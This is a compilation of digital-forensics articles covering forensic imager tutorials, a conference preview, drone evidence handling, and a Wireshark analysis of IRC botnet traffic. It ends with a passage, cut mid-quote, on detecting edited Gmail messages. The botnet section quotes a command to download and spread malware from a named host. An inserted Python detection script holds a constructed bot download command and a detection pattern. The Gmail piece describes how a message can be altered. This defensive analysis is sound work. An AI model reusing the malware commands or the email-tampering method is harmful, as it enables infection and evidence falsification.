As drive sizes grow, it may be inefficient to image an entire drive. Logical imaging allows investigators to quickly zero in on relevant files and streamline the acquisition process.

We hope you found this tutorial of interest. To learn more about the Falcon NEO, please visit our website at logicube.com or contact our sales team at sales@logicube.com.

How To: Use The File Browser Feature In Logicube’s Forensic Falcon NEO


Welcome to Logicube’s tutorial on the Forensic Falcon NEO. In this session, we’ll show you how to use the file browser feature.

The file browser feature of the Falcon NEO provides logical access to source and destination drives connected to the Falcon NEO. To open the file browser, click on the left-hand menu and click on the File Browser icon. The browser can be used directly on the Falcon NEO’s display, which can be useful when you’re out in the field and there are no computers available; or the browser can be used from the web interface, as we’ve done here.

The file browser can open several types of image files, including jpeg, png, gif, and can also open text, HTML and PDF type files. Using the web interface on a PC also gives you the ability to download files to that same PC and then preview any files that cannot be previewed on Falcon NEO.

To select the drive to browse, tap at the top of the screen; you’ll see tabs for all of the drives connected to the Falcon NEO. Both source and destination drives will be displayed, the latter if the destination drive was formatted by the Falcon NEO. Drives connected to the source position are write-protected, so opening a file, whether from the Falcon NEO’s display interface or from a web browser on a PC, will not alter the forensic integrity of the source drive connected to the Falcon NEO.

The file browser will show all of the partitions that can be read. We’re going to go ahead and select partition two. And using the scrollbar on the right-hand side you can scroll through all of the folders that are available here. We’re going to click on Demo; you can see we have Documents, Photos, Videos; I’ll click on Photos and again you can use the scrollbar on the right to scroll through all of the photos that are available here. We’ll go ahead and click on a couple of these, and you can see the photo pops up here; we’ll click on a second one, and again the photo will show up here.

If we scroll back up to Documents, you can see that there’s a PDF file here; we’ll click on that, and again we can see that pops up, you can scroll through it.

If there is a particular file that is not viewable on the Falcon NEO, for example this .doc or document file, when you click on it you’re going to see an error message that says “File viewer cannot view file type”. If you are using the web browser on a PC, if you right-click that file and then click on ‘Save link as…’, you can save that file to the desktop of your computer so that you can view it at a later point.

The file browser feature helps streamline the evidence collection process. When faced with large volumes of suspect drives, the ability to preview and triage drive contents can be extremely beneficial. Investigators can prioritise drives based on content, for imaging now or at a later time.

We hope you found this tutorial of interest. To learn more about the Falcon NEO please visit our website at logicube.com, or contact our sales team at sales@logicube.com.

How To: Integrate LACE Carver With Griffeye Analyze DI Pro


Let’s talk about the exciting new LACE Carver Integration with Analyze DI Pro. Once you have the proper license, you can head over to your Downloads page on MyGriffeye.com and go to the LACE Carver download. Once the app package has been downloaded, we can go back to Griffeye and install it under Settings, Plugins, and click on the Install button, selecting the file we just downloaded from the internet.

Once the file is fully extracted and the plugin has been installed, you can head over to the Analyze Forensic Marketplace, where we now have LACE Carver integration. If you click on it, you can get Introduction, Installation information, and how to use it as well.

Now let’s create a new case and check out the additional processing features available to us with the LACE Carver integration. The first thing you’ll notice is we have an additional selection, Physical Media. The LACE Carver integration allows Griffeye Analyze DI to point directly to a physically connected device.

Notice that when we select the device, we can either look at it on the physical level or the logical level, whichever you prefer. None of my physically connected devices are write-blocked, so I’m going to use a forensic image file that I’ve already created.

Once I select the image file, notice it gives me additional options on how to process this forensic image. If I select Import Forensic Image, I get the standard Analyze DI import, which does not get unallocated files. But if I select Carve Forensic Image with LACE, it handles the entire processing of the E01 file to include valid files and unallocated files. It also gives me several carving options and an Advanced button if I want to further refine what I’m looking for – it could be images, videos, documents, deleted files, unallocated files, and some other file formats.

Because we chose the integrated Lace Carver to handle the forensic image file import, there’s no need to bring in an additional folder containing carved unallocated files. It’s all contained in the same source ID in this investigation. So, we can continue to process our case as we normally would. The Integrated LACE Carver will begin to carve the forensic image. Now, remember, this is getting valid files as well as deleted and unallocated files. Once the LACE Carver has completed processing the forensic image file, the results will be imported into the Griffeye case, as it normally would. Using the Integrated LACE Carver to process our forensic image, we found 33,804 files as a part of our investigation.

Now let’s take a look at a case I created using the same forensic image file, but selecting the standard import, not using the LACE Carver. I was only able to find 1,893 files in that forensic image. Now let’s take a look at the information we have within the case, about our files. In the grid view, the unallocated column now contains checkboxes on all the files that were found in unallocated space, as well as the physical file location or physical sector where that file was found. We also now have the ability to filter files that we found in unallocated space by going over to our filters, the File tab, and to the unallocated filter, and select Is Unallocated, and now we filter down to just the files we’ve found in unallocated space.

Thanks for watching. If you have any questions or comments, hit us up in the forums or send an email to support@griffeye.com.

How To: Multitask With Logicube’s Forensic Falcon NEO

Welcome to Logicube’s tutorial on the Forensic Falcon NEO. In this session we’ll show you how to multitask.

For this tutorial I have connected the Falcon NEO to a network, and from a PC on the same network I’ve logged into the unit using a web browser so that I can operate remotely. I’ve already started an imaging task, and we can easily add more tasks and start them simultaneously, streamlining the evidence collection process.

The Falcon NEO supports a total of up to five tasks of each operation type. To set a second, third or even fourth imaging task, click on the upper right icon ‘Add New Task’. A tab will pop up. Click on that tab and you’ll see that all of the icons for settings and mode and source and destination will appear in the centre of the screen.

We’ll click on ‘Mode’, and for this task I’m going to choose ‘Drive To Drive’, which is a bit-for-bit copy of the source drive. I’ll click on ‘Source’, we’re going to choose the PCIE drive in S1. Click ‘OK’. Our settings: we’ll maintain the 100% clone.

Case information: you can add case information here, and all of this information will then appear on the log file for this particular task. We’ll keep the defaults for HPA and DCO, which means that they are unlocked and available to clone. For error handling, we’ll choose ‘Skip’, and for error granularity we’ll choose ‘One Sector’, and for reverse read, we’ll choose ‘No’.

For your hash verification in this case, with this clone, I will choose none, and have no verify. Click ‘OK’. ‘OK’ again. And then select your destination drive. In this case I’ll select D1. All drives that are connected to the Falcon NEO destination side will appear in this list.

Once you have all of your settings completed, just press ‘Start’. A confirmation prompt will appear; click ‘Yes’, and now we have a second imaging task running. I can add a third task, again the tab will pop up, click on that, select your mode – in this case we’ll use our default, Drive To File. For our source drive I’m going to choose S1, click ‘OK’. For settings we’ll use the default settings, so E01, hash method SHA-1, click ‘OK’, choose the destination: in this case I’m going to choose D1. Click ‘OK’ and just press ‘Start’.

And again, a progress bar will appear. We have three imaging tasks running. And in the upper left-hand corner at the top of the screen, you’ll see icons for each of the tasks that are running on the Falcon NEO. And these will fill in with green areas as the tasks proceed.

We can now add a Wipe / Format task if we wanted to. So again, [from] the icons in the middle of the screen, choose a destination. In this case we’re going to choose D4. Click ‘OK’. For settings we’re going to choose Secure Erase, because I know that this drive does support secure erase. If it did not, we could choose to use a wipe pattern – it could be a seven-pass wipe, or a custom wipe with a custom number of passes.

We want to have this drive formatted, so we’re going to click on ‘Settings’. Click ‘On’. And then choose the file system – in this case we’re going to choose NTFS, but you can choose EXT4, EXFAT or FAT32. You could also choose to have the destination drive encrypted; in this case we’re clicking ‘Off’. Click ‘OK’. ‘OK’ again. You could also add case information if you wanted to.

We’ll click ‘Start’, and now you’ll see ‘W’ has been added to this upper area here, showing that there is a wipe task.

You can add a second wipe task if you wanted by clicking on ‘Add’; we could also add a hash verify task if we wanted to. The mode in this case is either drive hash or case verify; we’ll choose case verify. Click ‘OK’.

We’ll choose the case, which would be on D3. Click ‘OK’. You’ll see that there is a case here – E01 Capture – we’re going to select that, click ‘OK’. Your settings will be to verify the primary hash. You could add case information if you wanted to. We’ll click ‘Start’, click ‘Yes’, and now we have a hash task running.

Again, all of the information appears up here, just see all of the tasks that are running. If you go back to imaging you can toggle between each of the tasks to see the full progress of that particular task, for example in image 1 we’re about 64% done. It is showing the number of bytes being processed. In this case you’ll see even though this is a 1 TB drive, it is showing 2 TB being processed because we’ve chosen ‘Verify’. The speed for this particular task is running at 48.5; that’ll increase as the drive continues to be processed. The elapsed time will be shown as well as the remaining time for this particular task to be finished.

We hope you found this tutorial of interest. To learn more about the Falcon NEO please visit our website at logicube.com, or contact our sales team at sales@logicube.com.

Walkthrough: Forensic Falcon NEO From Logicube

Welcome to Logicube’s tutorial on the Forensic Falcon NEO. In this session, we’ll conduct a product tour, including all of the various ports available, and show you how hard drives are connected to the Falcon NEO.

At the front of the Falcon NEO you will find two USB 3.0 ports that can be used as destination ports. On the top of the unit is the touchscreen display. On the rear of the Falcon NEO you will find two power points; two fans; two network ports; and an HDMI port.

On the left, or Source, side of the Falcon NEO you will find two SAS / SATA ports, one USB 3.0 port, and one PCIE port. All ports on the Source side of Falcon NEO are write-protected.

On the right side, or Destination side, of Falcon NEO, you will find two SAS / SATA, two SATA, one USB 3.0, and one PCIE port.

It’s easy to connect hard drives to the Falcon NEO. Here we have connected one SATA suspect SSD to the Source, or write-protected, side of the Falcon NEO; and one SATA SSD to the Destination side of Falcon NEO.

You can continue to add hard drives to both the Source and Destination sides of Falcon NEO. The NEO supports four source drives and eight destinations.

We’ve now added a second SATA drive to the Source port of the Falcon NEO, and we’ve also added a second SATA drive to the Destination side of the Falcon NEO.

Here we’ve added a USB enclosure to the Source side of the Falcon NEO, and a third SATA drive to the Destination side.

Continuing on, we’ve added a PCIE M.2 drive to the PCIE source port and a fourth SATA drive to the destination SATA port.

Now that we have all four Source ports populated, we’ll continue to add drives to the Destination side of Falcon NEO. Here we’ve connected a USB enclosure to the USB 3.0 port on the Destination side.

A PCIE drive is now connected to the PCIE port on the Destination side of Falcon NEO. A seventh drive, a USB flash drive, is now added to the front destination USB 3.0 port.

Now we’ve added a final eighth drive: a USB flash drive to the second destination USB 3.0 port on the front of the Falcon NEO. All USB ports on the Falcon NEO can be converted to SATA using a USB-to-SATA adaptor.

The Falcon NEO now has a full complement of drives connected: four source drives and eight destinations.

Using the Falcon NEO you can image from four source drives to eight destinations simultaneously. You can easily set up imaging tasks, wipe tasks and hash tasks to all run concurrently directly from the user interface on the Falcon NEO display, or by using a web browser and a PC, operate the Falcon NEO remotely, as seen here.

The Falcon NEO can reach speeds of 50 gigabytes a minute for one-to-one imaging.

We hope you found this tutorial of interest. To learn more about the Falcon NEO, please visit our website at logicube.com, or contact our sales team at sales@logicube.com.

Techno Security & Digital Forensics 2019 – San Diego March 11-13

From the 11th to the 13th of March 2019, Forensic Focus will be attending the Techno Security & Digital Forensics Conference in San Diego, CA, USA. If there are any topics you’d particularly like us to cover, or any speakers you think we should interview, please let us know in the comments.

Below is an overview of the subjects and speakers that will be featured at Techno Security. The conference has four tracks: audit / risk management; forensics; information security; and investigations, along with sponsor demos. Forensic Focus will be concentrating on the digital forensics track throughout the event.

Monday March 11th

The first forensics talk of the conference will be given by Jimmy Schroering from DME Forensics, who will talk through some case studies of advanced DVR analysis. At the same time, Yulia Samoteykina and Vitaliy Mokosiy from Atola Technology will discuss how the need for rapid triage and extraction can be a challenge for digital forensic evidence acquisition. Meanwhile in the security track, Michael Prins from HackerOne will talk about how to leverage relationships with ‘friendly’ hackers who are willing to help companies to improve their security.

Directly following this, Angel Grant will discuss how a better understanding of the cultural elements of hacking can improve cyber investigations. Vico Marziale from BlackBag will talk about how much has changed in Windows 10, and what forensic investigators need to know when they encounter Windows 10 in their cases. Michael Riedijck from PageFreezer Software will discuss social media evidence collection and how it can be used for ediscovery. Both Oxygen Forensics and Susteen will be giving demonstrations of their forensic solutions at the same time.

The penultimate session of day one will see MSAB’s James Eichbaum talking about mobile application analysis and demonstrating how to manually investigate app data and SQLite databases. There will also be a law enforcement panel happening at the same time, the exact nature of which will be confirmed at a later date. Demos from 2:45-3:45pm will be available from Hawk Analytics and Magnet Forensics.

Keith Leavitt from Cellebrite will be the final speaker in the digital forensics track on Monday, looking at mobile evidence in P2P investigations. Meanwhile Don Brister from Berla will talk through some examples of vehicle forensics, and Richard Gurecki will show attendees how to extract data from water damaged devices, focusing on iPhones and Android phones. An IoT panel will convene at 4pm, discussing how to tackle a data breach, and Arman Gungor from Metaspike will demonstrate how to leverage server metadata in email investigations.

Tuesday March 12th

Tuesday’s sessions will begin at 9:30am with the intriguingly named ‘1+1 Is Not Always 2’, which will look at how to bypass multi-factor authentication. Meanwhile Keith Leavitt will take to the stage again to demonstrate some advanced techniques for mobile analysis. A panel will convene in the Grande E room to discuss the challenge of impermanence in forensic analysis and ediscovery, and what happens when we collect ephemeral evidence from messaging services, social networks and similar media. From 9:30 attendees will also have the chance to see demos from BlackBag Technologies and Truxton Forensics.

The next session’s demos will be from Magnet Forensics and Oxygen. Alongside these, Jason Hale from One Source Discovery will talk about how to improve USB device forensics, and Kirby Plessas will show us how to use open source intelligence techniques for cryptocurrency attribution.

The excellent Women In Cyber panel will be returning after lunch, to discuss some of the challenges faced by women in the industry and how they can be addressed. Meanwhile Jessica Hyde from Magnet will be talking about how to handle IoT evidence more effectively, and Julie Lewis from Digital Mountain will demonstrate how to extract and analyse digital evidence from social networking sites and smartphone applications. MSAB’s Global Training Manager will talk attendees through XAMN and XEC Director, showing how they can save time and speed up investigations.

Eric Schmidt from the CATCH Task Force will show attendees how to think outside the box when conducting OSINT investigations, and Kathy Helenek will demonstrate the effective analysis of cloud storage services. Two speakers from Nike’s forensics department will tackle the popular topic of lab accreditation and explain how to make it work.

In the last session of the day, Mike Melson and Nick Barker from Hawk Analytics will talk about how to testify on cell data records, which can be a tricky subject to discuss in court. Steven Watson from VTO Labs will talk us through some case studies of drone forensic investigations, and discuss some current challenges, while in the Canyon room Richard Spradley will demonstrate Whooster’s ability to bring back accurate and useful real-time investigative data results.

Wednesday March 13th

The final day of the conference will begin with two ‘early riser’ options at 8am: Jennine Gilbeau from the US Department of Homeland Security will talk about securing the digital landscape, and another session will look at the dark web, though the speaker and details are still to be confirmed.

At 9:15am attendees will be able to discover how to use the GDPR to improve their companies’ bottom line, culture and IT practices. Jay Cooper from Sumuri will be discussing some APFS imaging considerations, while Michele Stuart from JAG Investigations will show attendees how to use OSINT and social media data to identify and locate individuals of interest. In the computer security track, Donald Malloy from OATH will be tackling the tricky topic of how to let the good guys in while keeping the bad guys out when it comes to IoT security. There will also be a Cellebrite demo happening in the Canyon room.

In the last session of the morning Passware will be in the Canyon room demonstrating their forensic solutions. Greg Scarbro from the FBI will be showing attendees the FBI’s Next Generation Identification system – this was a fascinating talk at Techno Security TX and is highly recommended! Jessica Hyde will be talking about Apple’s “tween years”, from iOS 10 through to 12.

Following lunch there will be a session about preventing common cloud migration mistakes, alongside two speakers from Whooster who will show attendees how to access unique investigative data in real time. Oxygen’s Lee Reiber will look at how to get hold of location data and put it to use in investigations, while Jeremy Kirby from Susteen will show how to acquire immediate evidence from cell phones in the field.

The final sessions of the conference will focus on examining the WhatsApp messenger on Android devices; how to use the Windows PowerShell and command prompt as investigative tools; and how to address the challenge of user privacy in cars.

To view the full conference program and register to attend, please visit the official website. Forensic Focus readers can enjoy a 30% discount on the registration price by entering the code FFOCUS19 when booking. 

If there are any talks you would specifically like us to cover, or any speakers you’d especially like to see interviewed, please leave a comment below or email scar@forensicfocus.com.


Scene Of The Crime: You’ve Found A Drone. What Do You Do?

by Lee Reiber, COO, Oxygen Forensics, Inc.

The proliferation of recreational drones and their impact on digital incident response has dramatically increased during the last several years. In January 2018, Nextgov stated the U.S. Federal Aviation Administration (FAA) reported over 1 million drone operators registered with the United States government. This number continues to grow each holiday season, when new unmanned aircraft systems (UAS) are introduced to market and users hit the streets armed with drones that can fly great distances, record crystal clear video, and carry a payload.

These systems are currently regulated by the FAA, and guidelines have been given to local law enforcement on how to handle drone incidents. However, these guidelines apply only to systems that have been registered in the United States. Those that have not been registered are currently allowed to fly and will continue to fly.

Types of Investigations

UAS investigations may involve simple infractions such as flying in a restricted area like a military installation or park, as well as intentional criminal activities such as flying within no-fly zones (e.g., airports, prisons, etc.), invasion of privacy and surveillance, or delivery of controlled substances. These violations or crimes represent limited risk, but what about the delivery of a weapon of mass destruction? Once inconceivable by an over-the-counter UAS, the ability to deliver and disperse liquid containers, aerosol containers, explosive devices, or other munitions is now a reality.

Drones can now carry sufficiently large items to potentially be considered a threat

Additionally, outside the work of nefarious actors, how do we prevent unintended consequences resulting from thousands of law enforcement officers and commercial pilots operating UAS systems capable of carrying hundreds of pounds? If left unaddressed, these issues may result in massive setbacks for law enforcement, and forensic investigators must be prepared to handle the data.

First responders, investigators, and legal teams must be ready not only to combat this real threat but also to recover valuable data and identify those responsible.

At the Scene of Discovery: First Responders

When responding to an event that involves a UAS it is important to survey the device from a distance. A UAS can carry explosives or other harmful substances, and running into the scene could have disastrous results. Once the scene has been rendered safe, the first responder or investigators on scene should recover any wet evidence or package the device in such a way to preserve the device and any residual evidence.

Be sure to render the device safe at the scene

Once the device has been rendered safe, remove the battery and transport the device to a safe location for processing. If the device is destroyed and in pieces, it is important to look for the main body of the device, which contains the motherboard with the flash chip. Also, many drones have external memory cards that are inserted into a slot connected to the motherboard. If the card is missing, look in the area and recover it if found. Additional devices found with the UAS, like mobile phones, controllers, VR goggles, or other components, should also be seized and transported to a safe location.

In the Lab: Digital Investigators

UAS systems contain valuable information that can tell an investigator where an aircraft was at the time of an event. Furthermore, information such as altitude, velocity, direction, rotor speed, battery power, XYZ axis, user email, user account, and other valuable data can be contained within controllers, mobile device apps, VR goggles, external media cards, cloud sources, and, most importantly, the aircraft itself. However, precautions must be taken.

There are several methodologies and thoughts on processing the data from the physical UAS. Much like mobile devices, the UAS receives a signal from a controller to operate. So, if you are processing the UAS while ON, then isolate the device from any available cellular, radio, Wi-Fi, or Bluetooth network. Process any removable media card physically and obtain a bit-by-bit image to recover deleted images, log files, or other files that could be of importance. Connect the device via USB and obtain a physical collection of the internal eMMC to later analyze.

An iTunes backup will generally be able to recover the required information and databases

If the device is OFF when coming into the lab, process the external media card physically and, if possible, carefully dismantle the device and first attempt a non-invasive JTAG, ISP, or other extraction technique to obtain a physical image of the internal eMMC. If this method is not viable, there is an option to remove the flash and conduct a read of the chip using a programmer (chip-off). This data can then be ingested into digital forensic tools to parse and decode valuable data. Removing the chip from the device is destructive, and should only be utilized if there are no other options.

If a mobile device was used to control the UAS the information from the app can be extracted to provide important log files, images, videos, account information, and more. With iOS devices an iTunes backup can generally recover the information and databases, while Android devices generally will need to be rooted or a physical image obtained to gather the detailed flight logs and account information.

In the Courtroom: Prosecutors

Clearly documenting the process of not only the investigation but also the seizure is critical to the prosecution. The investigation of a UAS is not a trivial matter, and if details are left undocumented (e.g., ON/OFF, non-invasive/invasive, media card/no media card) the case may be in peril. Unlike the early “wild west” years of extracting and using cellphone data in cases, a UAS digital investigation should follow exact protocols.

Documentation, standard operating procedures (SOPs), and implementation of a forensic methodology will assist in successful investigation and prosecution. Failing to plan will often prove fruitless and create more work during an investigation. There is no better time to acquaint your team, investigators, and legal counsel with the critical information that can be gleaned from a UAS when it is part of an investigation.

Dissecting Malicious Network Traffic To Identify Botnet Communication

by Swasti Bhushan Deb

Botnets are well-known in the domains of information security, digital forensics and incident response for hosting illegal data, launching DDoS attacks, stealing information, spamming, bitcoin mining, spreading ransomware, launching brute force attacks, managing remote access to connected devices, and even propagating infection to other devices, among other things. Internet Relay Chat (IRC) networks are a popular medium for controlling bot networks. IRC-based bots with varying degrees of sophistication and customized commands have something in common. An IRC bot, when executed on a client machine, connects to an IRC server on a random high port, logs into a definite predefined channel and listens for commands issued by the bot master.

The botnet lifecycle starts with the infection phase, where a system is compromised by a customized and preconfigured piece of malware. The connection phase is when the infected system initiates contact on a predefined remote IRC TCP service port for communication. A nickname, password or key may authenticate the bot’s access to the channel. In the command & control phase, the bot receives commands from the bot master via the designated channel of communication (C2C). Finally, in the multiplication phase, customized and preconfigured malware is downloaded onto the infected bot for further control and to spread infection via USB devices, writable network shares and so on.

This article presents a proof of concept aimed at analysing the unique communication to and from an infected host and a botnet. The network capture used can be found here. The analysis was carried out using Wireshark. The analysis and observations will assist in the initial investigation of the network capture to identify traffic illustrating typical bot behaviour: joining a predefined channel with a nickname or username; messages exchanged between the bot and the bot master; spreading infection, and so on.

Observations

  1. A total of 60 packets were observed in the pcap file. IP addresses identified:
    1. 192.168.45.130: port 1037 (service: ams); port 1038 (service: mtqp)
    2. 192.168.45.2: port 53 (service: DNS)
    3. 91.121.100.60: resolved address irc.accesox.net; TCP port 5540 (service: sdreport)
  2. IP 192.168.45.130, port 1037, initiates a DNS query to 192.168.45.2, port 53, for name resolution of irc.accesox.net. The DNS response from 192.168.45.2 resolves the name to 91.121.100.60 and 91.121.96.162.
  3. Packets 3, 4 and 5 detail the TCP three-way handshake. The handshake was initiated from 192.168.45.130, port 1038, and destined to irc.accesox.net (91.121.100.60, port 5540).
  4. Packet 6: the IRC “PASS” message was used to set a ‘connection password’ by the host bot, 192.168.45.130. This is used to register a connection with the IRC server irc.accesox.net (91.121.100.60).
  5. Packet 8: the IRC “NICK” message was used to give the user a nickname (pLagUe{) by host 192.168.45.130.
  6. Packet 10: the IRC “USER” message was used to specify the username by host 192.168.45.130. The parameters alongside the message are in the format <username> <hostname> <servername> <realname>. The username was identified as “sKuZ” and the real name as “TeaM UniX b0at 0.4”.
  7. Packet 12: the IRC server irc.accesox.net (91.121.100.60) replies to the host (192.168.45.130). The reply originates from server “sex.accesox.net” and indicates an authorization message by the server.
  8. Packet 15: the IRC server irc.accesox.net pings the client (192.168.45.130) with a hostname, as it could not resolve the hostname. The PING command was used to test the presence of the client bot.
  9. Packet 16: the PONG response indicates a reply by the client bot to the ping message of the IRC server.
  10. Packet 18: replies from server “sex.accesox.net”, which was created on “mar 25 2011 at 02:34:51 CET” and is running “Unreal3.2.9-rc1” (an open source IRC server). The IRC server welcomes the client bot with a series of additional replies. As per RFC 2812, this series of replies indicates successful registration by the client bot.
  11. Packet 19: a message from the client host to change its visibility mode to a hidden user on the IRC server.
  12. Packets 21 & 23: the JOIN command issued by the client bot, a request to start listening to the specific channel “verga”.
  13. Packet 25: PRIVMSG used by the client to send a private message to channel “verga”. The message “NueVo PuTo InfeCcIoN” in Spanish translates to “New WhOre InfeCtIOn” in English.
  14. Packet 27: details the command response from the IRC server. Indicates 56 users and 189 invisible on 9 servers, and informs the client host that the nickname isn’t registered.
  15. Packets 30-43: indicate re-registration initiated by the client bot.
  16. Packet 45: a command message from bot “pLagUe” to download an executable, “plaga.exe”, hosted at http://www.freewebtown.com/redzone/ into the system drive of the client bot (c:\jiji).
  17. Packet 53: details the response from the client bot to the IRC server, indicating that the virus has been written into the “autorun.inf” of (most likely attached) USB devices.

IRC Communication summary

Table 1: Packet-wise description

  • The interpretation of the IRC commands is based on RFC 2812.
  • The host at 192.168.45.130 joined irc.accesox.net (91.121.100.60) with username “sKuZ” and joined channel “verga”.
  • The pLagUe{USA}64007 bot instructs the client bot (192.168.45.130) to download an executable, “plaga.exe”, hosted at http://www.freewebtown.com/redzone/, store it in the system drive (c:\jiji) and inject itself into the “autorun.inf” of attached USB devices. This indicates the propagation mechanism used in this case.
  • The executable “plaga.exe” hosted at http://www.freewebtown.com/redzone/ was flagged as malware by VirusTotal. The VirusTotal graph indicates multiple malware instances hosted by subdomains of http://www.freewebtown.com.

From the observations cited above, it would be reasonable to conclude that the host at 192.168.45.130 made a DNS query to 192.168.45.2 for resolution of irc.accesox.net. It is assumed that the host at 192.168.45.130 could be infected with an IRC Trojan which initiated a TCP connection to irc.accesox.net, logged into a predetermined IRC channel and, based on the commands issued by the bot master, spread further infection by infecting the autorun.inf of the attached USB devices.

Analysis

Capture File Properties: A quick glance at the pcap file using Wireshark indicates a total of 60 packets. This can be seen in the “Capture File Properties” window, opened by selecting the “Capture File Properties” option from the Statistics drop-down menu.

TCP Stream: An excerpt of the TCP stream is detailed below and indicates 19 client packets and 13 server packets. The “Follow TCP Stream” window can be used to visualize protocols in the way that the application layer sees them. This can be achieved by right-clicking on any TCP packet and selecting Follow > TCP Stream. Figure 1 shows the TCP stream and the relevant information required to understand the bot communication.

Figure 1: Excerpt of TCP stream

1-Connection password set by the host bot
2-Nickname set by the host bot
3-Username set by the host bot
4-Notice from IRC server sex.accesox.net
5-PING command from IRC server & PONG response from bot
6-IRC network info
7-Visibility mode set by client bot as hidden
8-Client bot request message to start listening on specific channel – “verga”
9-Private message from client bot on channel – “verga”
10-Additional message indicating the number of active channels, local users, online operators etc. on the IRC server
11-Request message indicating a re-registration attempt of the client bot to listen on channel “verga”
12-Message from the botnet – pLagUe to download an exe (plaga.exe) from http://www.freewebtown.com/redzone/
13-Private message from client bot indicating successful injection of the exe into autorun.inf of four USB devices
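As an added example that is not part of the article, the following Python parser walks a constructed IRC stream (placeholder server, nick, channel and URL, not the capture above) and reports the behaviours listed in the observations and in the Figure 1 legend: PASS/NICK/USER registration, a JOIN to a fixed channel, and channel messages that direct the client to fetch an executable or report touching autorun.inf.

```python
"""Triage of an IRC bot session reconstructed from a TCP stream.

Added example, not the article's own code. The lines in SAMPLE_STREAM are a
constructed stand-in for a Wireshark "Follow TCP Stream" excerpt; every server
name, nick, channel and URL is a placeholder. A single pass over the stream
records the registration sequence, channel joins and any PRIVMSG content that
matches the two propagation patterns the article describes.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed stream: ">" lines are client -> server, "<" lines are server -> client.
SAMPLE_STREAM = """\
> PASS s3cretkey
> NICK botnick{XX}12345
> USER botuser 0 * :Team Placeholder 0.4
< :irc.example.invalid NOTICE AUTH :*** Looking up your hostname...
< PING :A1B2C3D4
> PONG :A1B2C3D4
< :irc.example.invalid 001 botnick{XX}12345 :Welcome to the Example IRC Network
> MODE botnick{XX}12345 +i
> JOIN #chan
> PRIVMSG #chan :New infection reporting in
< :master!op@example.invalid PRIVMSG #chan :!download http://example.invalid/payload.exe c:\\jiji\\payload.exe
> PRIVMSG #chan :[autorun.inf] infected 4 usb devices
"""

# URLs ending in a Windows executable-type extension.
EXE_RE = re.compile(r"https?://\S+\.(?:exe|scr|dll|bat|vbs)\b", re.I)


@dataclass
class IrcSession:
    password_set: bool = False
    nick: Optional[str] = None
    username: Optional[str] = None
    realname: Optional[str] = None
    channels: List[str] = field(default_factory=list)
    suspicious: List[str] = field(default_factory=list)


def parse_line(direction: str, line: str, s: IrcSession) -> None:
    """Classify one IRC line. Server lines may carry a ':prefix' before the verb."""
    if line.startswith(":"):
        _prefix, _, line = line.partition(" ")
    verb, _, rest = line.partition(" ")
    verb = verb.upper()
    if direction == ">" and verb == "PASS":
        s.password_set = True
    elif direction == ">" and verb == "NICK":
        s.nick = rest.strip()
    elif direction == ">" and verb == "USER":
        # RFC 2812 form: USER <user> <mode> <unused> :<realname>
        params, _, real = rest.partition(" :")
        s.username = params.split()[0]
        s.realname = real
    elif direction == ">" and verb == "JOIN":
        s.channels.append(rest.split()[0])
    elif verb == "PRIVMSG":
        target, _, text = rest.partition(" :")
        hit = EXE_RE.search(text)
        if hit:
            s.suspicious.append(f"{target}: download instruction -> {hit.group(0)}")
        if "autorun.inf" in text.lower():
            s.suspicious.append(f"{target}: removable-media propagation report")


def analyse_stream(stream: str) -> IrcSession:
    """Parse a direction-prefixed stream dump into an IrcSession summary."""
    s = IrcSession()
    for raw in stream.splitlines():
        if not raw or raw[0] not in "<>":
            continue
        parse_line(raw[0], raw[2:].strip(), s)
    return s


def bot_indicators(s: IrcSession) -> List[str]:
    """The sequence the article describes: registration, channel join, C2 traffic."""
    out = []
    if s.password_set and s.nick and s.username:
        out.append("registered with PASS/NICK/USER")
    if s.channels:
        out.append("joined channel(s): " + ", ".join(s.channels))
    out.extend(s.suspicious)
    return out


if __name__ == "__main__":
    for line in bot_indicators(analyse_stream(SAMPLE_STREAM)):
        print(line)
```

On a real capture, paste the client/server lines from the "Follow TCP Stream" window into the same ">" / "<" form and the same pass applies.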

“Protocol Hierarchy Statistics”: Packets usually contain multiple protocols. The “Protocol Hierarchy Statistics” window shows a tree of all the protocols in the capture. This serves as an initial assessment of the major protocols present in the capture. Applying the TCP “Data” field as a display filter lists the TCP packets containing data. The protocol hierarchy chart in Wireshark can be generated by selecting the “Protocol Hierarchy” option from the Statistics drop-down menu.

References

IETF
Wireshark

Forensic Examination Of Manipulated Email In Gmail

by Arman Gungor

Last week, I came across an interesting post on Forensic Focus. The poster, jahearne, was asking about how one can detect manipulation of an existing email in Gmail. In his hypothetical scenario, the bad actor was using Outlook to edit the message and change its contents after it was received. I wanted to reproduce this setup and examine the results to see what we find out.

The Setup

I started by performing a baseline acquisition of the target email account over IMAP—which is the same protocol Outlook would use to connect to Gmail. This allowed me to capture the Internal Date Message Attribute as well as the Unique Identifier (UID) Message Attribute for each message before any manipulation took place. I used our Forensic Email Collector to do this, but you can also capture these values by directly interfacing with Gmail’s IMAP server.

I then connected the Gmail account to Outlook 2016. Once Outlook finished downloading the messages, I picked the message that I wanted to manipulate. The original message looked as follows:

Original Gmail message

I then clicked the “Edit Message” menu item from the “Move” section in the toolbar ribbon for the email.

Editing Gmail message in Outlook

I changed the subject of the message from “Play games while you drive 🚘” to “Play games while you ride your horse” and changed the string “I used to drive 4 hours a day to get to SF” to “I used to drive 4 hours a day to get to San Diego” in the message body.

I clicked the “Save” button on the top left corner. Outlook indicated that it was synchronizing the folder, and voilà! The manipulated message was pushed to the server.

I double checked this by logging into Gmail’s web interface and pulling up the manipulated message. It looked as follows:

Manipulated email in Gmail

Now that our manipulated message had made its way back to Gmail, it was a good time to acquire the mailbox one more time for comparative analysis.

Forensic Examination of Manipulated Email

Server Metadata

The first question in my mind was how this affected server-side metadata—the Internal Date and Unique Identifier message attributes. Before manipulation, our message (highlighted) and its four immediate neighbors had looked as follows:

Note that the UIDs were in ascending order while the messages were sorted chronologically by Internal Date.

Now, let’s take a look at the same set of messages after the manipulation:

As expected, the manipulation changed the cryptographic hash of the email message. But more importantly, it caused Gmail’s IMAP server to assign the message a new UID. That is not a Gmail quirk: RFC 3501 requires UIDs to be assigned in strictly ascending order within a mailbox and never reused, so any message introduced with APPEND receives a UID higher than every message already in the folder. Now, when we look at the messages in chronological order, the UID of the manipulated email is no longer in sequence; in fact, it received the greatest UID in the folder. Let’s take a look at the mechanism that caused this.

How Did Outlook Replace The Message on The Server?

In the background, Outlook issued an APPEND IMAP command to Gmail’s IMAP server and introduced the altered email into the mailbox as a new message. As an argument to the APPEND command, Outlook passed the Internal Date of the original message. The IMAP specification for the APPEND command (RFC 3501, section 6.3.11) states that:

